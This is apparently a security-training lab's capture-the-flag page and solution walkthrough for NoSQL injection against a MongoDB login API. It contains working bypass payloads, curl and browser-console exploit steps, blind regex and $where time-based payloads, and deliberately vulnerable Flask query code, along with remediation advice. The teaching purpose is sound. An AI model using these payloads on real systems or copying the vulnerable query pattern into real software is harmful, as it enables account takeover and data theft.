Labs / MongoDB Injector

Challenge
Released 05 Sep 2025

🍃 Can you exploit NoSQL queries to bypass their document database security?

A modern user management system relies on MongoDB for secure data storage, implementing document-based authentication and user profiles. But when JSON queries meet insufficient input sanitization, even the most flexible NoSQL databases can become vulnerable to injection attacks. 🎯 Time to test your NoSQL exploitation skills against cutting-edge database technology!

Flags

Points

Challenge

Solution Available

Pro Exclusive

Start Lab Environment

~1-2 min setup

AWS dedicated

Private instance

Industry standard

Challenge

🍃 MongoDB Injector - Complete NoSQL Injection Solution

Objective: Exploit NoSQL injection vulnerabilities in a MongoDB-based user management API to bypass authentication and gain administrative access to retrieve the flag.

🔍 Step 1: Understanding NoSQL Injection

NoSQL injection occurs when user input is directly incorporated into database queries without proper sanitization. Unlike SQL injection, NoSQL injection exploits the flexible query structure of document databases like MongoDB, often using JSON operators and query manipulation.

Normal MongoDB Query:
db.users.find({"username": "admin", "password": "secret"})

Vulnerable Construction:
db.users.find({"username": user_input, "password": pass_input})

With NoSQL Injection:
db.users.find({"username": {"$ne": null}, "password": {"$ne": null}})

🔍 Step 2: Application Analysis

Navigate to to access the SecureDoc User Management API. The application provides a REST API for user authentication and profile management with the following endpoints:

POST /api/login - User authentication (vulnerable to NoSQL injection)
GET /api/profile - User profile information
GET /api/admin/users - Admin-only user listing
GET /api/admin/flag - Admin-only flag endpoint

Test Credentials:

Regular User: username: testuser, password: password123
Admin credentials are NOT provided - exploitation is required

🔍 Step 3: Identifying the Vulnerability

The application constructs MongoDB queries by directly incorporating user input:

# VULNERABLE: Direct incorporation of user input
query = {
    "username": request.json.get('username'),
    "password": request.json.get('password')
}
user = db.users.find_one(query)

This construction allows attackers to inject MongoDB operators and manipulate query logic.

🔍 Step 4: NoSQL Injection Techniques

Operator Injection

# Inject $ne (not equal) operator
{
  "username": {"$ne": null},
  "password": {"$ne": null}
}

# This matches any user with non-null credentials

Regex Injection

# Inject $regex operator
{
  "username": {"$regex": ".*"},
  "password": {"$regex": ".*"}
}

# This matches any username and password

🔍 Step 5: Authentication Bypass Attack

The most effective NoSQL injection payload uses the $ne (not equal) operator:

Working Payload:
POST /api/login
Content-Type: application/json

{
  "username": {"$ne": null},
  "password": {"$ne": null}
}

How this works:

The query becomes: db.users.find({"username": {"$ne": null}, "password": {"$ne": null}})
The $ne: null condition matches any document where the field is not null
MongoDB returns the first user that matches (often an admin user)
The application authenticates as that user without knowing the actual credentials

🔍 Step 6: Step-by-Step Exploitation

Using cURL

# Execute NoSQL injection
curl -X POST /api/login \
  -H "Content-Type: application/json" \
  -d '{"username":{"$ne":null},"password":{"$ne":null}}' \
  -c cookies.txt

# Expected response:
# {"message":"Login successful","user":"admin"}

Verify Admin Access

# Check if we gained admin privileges
curl -X GET /api/admin/users \
  -b cookies.txt

# Should return user list if admin access gained

🔍 Step 7: Flag Retrieval

With admin privileges gained through NoSQL injection, access the flag:

# Access admin flag endpoint
curl -X GET /api/admin/flag -b cookies.txt

# Expected response:
{
  "flag": "[FLAG_UUID_HERE]",
  "message": "Congratulations! You have successfully exploited the NoSQL injection vulnerability.",
  "admin_user": "admin"
}

🔍 Step 8: Alternative NoSQL Injection Techniques

Greater Than Injection

# Using $gt (greater than)
{
  "username": {"$gt": ""},
  "password": {"$gt": ""}
}

# Matches users with non-empty strings

Exists Operator

# Using $exists operator
{
  "username": {"$exists": true},
  "password": {"$exists": true}
}

# Matches users where fields exist

In Operator

# Using $in operator
{
  "username": {"$in": ["admin", "root", "user"]},
  "password": {"$ne": null}
}

# Targets specific usernames

🔍 Step 9: Browser-Based Exploitation

You can also exploit this using browser developer tools:

Navigate to and open Developer Tools (F12)
Go to the Console tab
Execute the following JavaScript:

// NoSQL injection via browser console
fetch('/api/login', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({
    username: {$ne: null},
    password: {$ne: null}
  })
})
.then(r => r.json())
.then(data => {
  console.log('Login result:', data);
  // If successful, get the flag
  return fetch('/api/admin/flag');
})
.then(r => r.json())
.then(flag => console.log('Flag:', flag));

🔍 Step 10: Understanding MongoDB Query Structure

MongoDB queries use JSON-like syntax with special operators:

Operator	Description	Example
`$ne`	Not equal	`{"field": {"$ne": "value"}}`
`$gt`	Greater than	`{"age": {"$gt": 18}}`
`$lt`	Less than	`{"age": {"$lt": 65}}`
`$in`	In array	`{"role": {"$in": ["admin", "user"]}}`
`$regex`	Regular expression	`{"name": {"$regex": "^A.*"}}`
`$exists`	Field exists	`{"email": {"$exists": true}}`
`$or`	Logical OR	`{"$or": [{"a": 1}, {"b": 2}]}`

🔍 Step 11: Advanced Exploitation Techniques

Blind NoSQL Injection

# Extract username character by character
{
  "username": {"$regex": "^a.*"},
  "password": {"$ne": null}
}

# Test if username starts with 'a'

Time-Based Injection

# Using $where for JavaScript execution
{
  "$where": "sleep(5000) || true",
  "username": "admin"
}

# Causes 5-second delay if vulnerable

🔍 Step 12: Burp Suite Exploitation

Using Burp Suite for systematic testing:

Configure browser to use Burp proxy
Navigate to the application and attempt normal login
Intercept the login request in Burp
Send the request to Repeater
Modify the JSON payload to include NoSQL operators
Test various injection payloads systematically
Analyze responses for successful authentication

🔍 Step 13: Vulnerability Analysis

The vulnerability exists because:

# VULNERABLE Flask code
@app.route('/api/login', methods=['POST'])
def login():
    data = request.get_json()
    # Direct incorporation of user input - DANGEROUS!
    query = {
        'username': data.get('username'),
        'password': data.get('password')
    }
    user = db.users.find_one(query)
    if user:
        session['user'] = user['username']
        return jsonify({'message': 'Login successful', 'user': user['username']})
    return jsonify({'error': 'Invalid credentials'}), 401

Key vulnerability factors:

Direct Input Incorporation: User input directly used in database query
No Input Validation: No checks for MongoDB operators in input
JSON Parsing: Flask automatically parses JSON, allowing object injection
Flexible Query Structure: MongoDB's flexible query syntax enables operator injection

🔍 Step 14: Security Implications

NoSQL injection vulnerabilities can lead to:

Authentication Bypass: Gain unauthorized access to user accounts
Data Extraction: Extract sensitive information from the database
Privilege Escalation: Access administrative functions
Data Manipulation: Modify or delete database records
Information Disclosure: Reveal database structure and contents
Denial of Service: Cause performance issues with complex queries

🔍 Step 15: Remediation Strategies

To prevent NoSQL injection vulnerabilities:

Input Validation: Validate and sanitize all user input
Type Checking: Ensure input matches expected data types
Operator Filtering: Remove or escape MongoDB operators from user input
Parameterized Queries: Use proper query builders and ORM libraries
Least Privilege: Use database accounts with minimal required permissions
Security Testing: Regular penetration testing for injection vulnerabilities
Schema Validation: Implement strict schema validation for input data

MongoDB Operators to Filter:
Common injection operators: $ne, $gt, $lt, $gte, $lte, $in, $nin, $regex, $where, $exists, $or, $and, $not

Flag Location: The flag is accessible at /api/admin/flag after successfully exploiting NoSQL injection to bypass authentication and gain admin privileges. The complete attack chain: NoSQL Inject → Bypass Auth → Gain Admin → Retrieve Flag.

Real-World Application: This challenge demonstrates realistic NoSQL injection techniques commonly found in modern web applications using document databases. The operator injection approach is based on actual vulnerabilities found in MongoDB-based applications and is a fundamental technique in NoSQL security testing.